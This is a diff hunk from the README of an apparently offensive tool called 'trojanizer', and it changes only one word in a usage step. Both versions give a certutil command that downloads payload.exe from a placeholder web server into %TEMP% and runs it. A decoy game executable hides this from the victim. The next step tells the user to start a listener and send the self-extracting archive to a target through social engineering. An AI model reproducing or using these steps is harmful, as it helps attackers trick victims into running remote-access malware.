r00t-3xp10it/trojanizer/README.md

     4º - running trojanizer tool
-         PAYLOAD TO BE COMPRESSED => screenshot.png (it will not matter what you compress) EXECUTE THIS FILE UPON EXTRACTION => AngryBirds.exe (to be executed as the decoy application) PRESETUP SANDBOX => cmd.exe /c certutil -urlcache -split -f 'http://webserver/payload.exe', '%TEMP%\\payload.exe'; Start-Process '%TEMP%\\payload.exe'
+         PAYLOAD TO BE COMPRESSED => screenshot.png (it will not matter what you compress) EXECUTE THIS FILE UPON EXTRACTION => AngryBirds.exe (to be executed as decoy application) PRESETUP SANDBOX => cmd.exe /c certutil -urlcache -split -f 'http://webserver/payload.exe', '%TEMP%\\payload.exe'; Start-Process '%TEMP%\\payload.exe'

     5º - start a listenner, and send the sfx archive to target using social enginnering